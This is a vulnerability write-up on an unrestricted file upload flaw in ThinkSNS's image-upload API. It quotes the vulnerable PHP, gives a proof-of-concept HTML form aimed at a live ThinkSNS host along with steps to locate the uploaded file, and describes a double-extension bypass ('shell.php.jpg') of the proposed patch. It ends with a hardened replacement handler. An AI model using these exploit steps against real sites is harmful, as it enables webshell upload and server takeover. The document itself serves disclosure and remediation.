When an image is attached to a microblog post, the file is validated only on the front end; the server performs no security filtering of its own.
\api\StatusesApi.class.php
function uploadpic(){
    if( $_FILES['pic'] ){
        // perform the upload
        $savePath = $this->_getSaveTempPath();
        $filename = md5( time().'teste' ).'.'.substr($_FILES['pic']['name'],strpos($_FILES['pic']['name'],'.')+1);
        if(@copy($_FILES['pic']['tmp_name'], $savePath.'/'.$filename) || @move_uploaded_file($_FILES['pic']['tmp_name'], $savePath.'/'.$filename))
        {
            $result['boolen'] = 1;
            $result['type_data'] = 'temp/'.$filename;
            $result['picurl'] = SITE_PATH.'/uploads/temp/'.$filename;
        } else {
            $result['boolen'] = 0;
            $result['message'] = '上传失败'; // "upload failed"
        }
    }else{
        $result['boolen'] = 0;
        $result['message'] = '上传失败'; // "upload failed"
    }
    return $result;
}
The uploadpic() method does not validate the file type at all: the stored name is the MD5 of the timestamp plus whatever follows the first dot of the client-supplied filename, so a .php upload is written to disk as <md5>.php.
You can build a form, choose any file, and submit it to
/index.php?app=w3g&mod=Index&act=doPost
The URL of the uploaded file can be found in the newly posted microblog entry (remove the small_ / middle_ thumbnail prefix to reach the original file).
After logging in to the official thinksns microblog,
build the following form:
<form action="http://t.thinksns.com/index.php?app=w3g&mod=Index&act=doPost" method="post" enctype="multipart/form-data">
<textarea name="content">test</textarea>
file: <input id="file" type="file" name="pic" />
<input type="submit" value="Post" />
</form>
Remove the thumbnail prefix (small_) from the image URL shown in the post to get the path of the file as stored.
Proposed fix:
\api\StatusesApi.class.php
function uploadpic(){
    /**
     * 20121018 @yelo
     * added upload type validation
     */
    $pathinfo = pathinfo($_FILES['pic']['name']);
    $ext = $pathinfo['extension'];
    $allowExts = array('jpg', 'png', 'gif', 'jpeg');

    $uploadCondition = $_FILES['pic'] && in_array(strtolower($ext),$allowExts,true);

    if( $uploadCondition ){
        // perform the upload
        $savePath = $this->_getSaveTempPath();
        $filename = md5( time().'teste' ).'.'.substr($_FILES['pic']['name'],strpos($_FILES['pic']['name'],'.')+1);
        if(@copy($_FILES['pic']['tmp_name'], $savePath.'/'.$filename) || @move_uploaded_file($_FILES['pic']['tmp_name'], $savePath.'/'.$filename))
        {
            $result['boolen'] = 1;
            $result['type_data'] = 'temp/'.$filename;
            $result['picurl'] = SITE_PATH.'/uploads/temp/'.$filename;
        } else {
            $result['boolen'] = 0;
            $result['message'] = '上传失败'; // "upload failed"
        }
    }else{
        $result['boolen'] = 0;
        $result['message'] = '上传失败'; // "upload failed"
    }
    return $result;
}
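Two caveats on the proposed fix. First, it whitelists the extension that pathinfo() reports (the part after the last dot) but still builds the stored name from everything after the first dot of the client name, so a client name of shell.php.jpg passes the check and lands on disk as <md5>.php.jpg; whether a web server executes such a name depends on its handler configuration (Apache with an AddHandler for .php applied to multi-extension names is the classic case), so the stored name should be built from the whitelisted extension alone. Second, pathinfo() is called on $_FILES['pic']['name'] before $_FILES['pic'] is tested, the upload error code is never checked, and nothing inspects the file content. The PHP below is an added example, not ThinkSNS code: it reproduces the check/storage mismatch of the patch and shows a replacement that derives the stored name only from the whitelist and the detected image type. The function names, the constructed 1x1 GIF and the sample client names are all assumptions for the demo.

```php
<?php
// Added example, not ThinkSNS code. Shows why the patch above is still
// loose and how a replacement handler could derive the stored name.

// What the patch validates: the LAST extension, as pathinfo() reports it.
function patchCheckedExt(string $clientName): string
{
    return strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
}

// What the patch stores: everything after the FIRST dot of the client name.
function patchStoredSuffix(string $clientName): string
{
    return substr($clientName, strpos($clientName, '.') + 1);
}

// Hardened replacement (hypothetical name). $file has the shape of $_FILES['pic'].
// Returns [true, "<random>.<ext>"] or [false, "<reason>"].
function hardenedTempName(array $file, array $allowExts = ['jpg', 'jpeg', 'png', 'gif']): array
{
    // 1. Reject missing or failed uploads instead of indexing into an absent entry.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return [false, 'no file or upload error'];
    }
    // 2. Whitelist on the last extension only; 'shell.php' and 'shell.gif.php' both fail here.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, $allowExts, true)) {
        return [false, 'extension not allowed'];
    }
    // 3. Header check: the bytes must parse as an image and agree with the extension.
    //    getimagesize() reads headers only, so a valid image carrying PHP in a
    //    comment chunk still passes; the server-chosen name and a no-exec upload
    //    directory are what keep such a file from ever running.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false) {
        return [false, 'not an image'];
    }
    $typeToExt = [IMAGETYPE_GIF => 'gif', IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png'];
    $detected = $typeToExt[$info[2]] ?? null;
    $wanted   = ($ext === 'jpeg') ? 'jpg' : $ext;
    if ($detected === null || $detected !== $wanted) {
        return [false, 'content does not match extension'];
    }
    // 4. Server-chosen name: random, and its only dot precedes the whitelisted
    //    extension, so no part of the client name ('shell.php.gif') survives.
    return [true, bin2hex(random_bytes(16)) . '.' . $detected];
}

// --- demo with constructed inputs ---
$name = 'shell.php.jpg';
printf("patch checks '%s' but stores suffix '%s'\n", patchCheckedExt($name), patchStoredSuffix($name));

// A constructed 1x1 transparent GIF stands in for the PHP temp file of a real upload.
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp, base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7'));
foreach (['avatar.gif', 'shell.php.gif', 'shell.gif.php', 'shell.php'] as $clientName) {
    [$ok, $out] = hardenedTempName(['name' => $clientName, 'tmp_name' => $tmp, 'error' => UPLOAD_ERR_OK]);
    printf("%-14s -> %s\n", $clientName, $ok ? $out : 'rejected: ' . $out);
}
unlink($tmp);
```

In a real handler the function would be called with $_FILES['pic'], the file would be moved with move_uploaded_file() only (dropping the @copy fallback, so that only a genuine upload is accepted), and the /uploads/ tree would be served with script execution disabled. The demo prints that the patch checks jpg but stores php.jpg, that avatar.gif and shell.php.gif both receive a random name ending in .gif, and that shell.gif.php and shell.php are rejected on the extension.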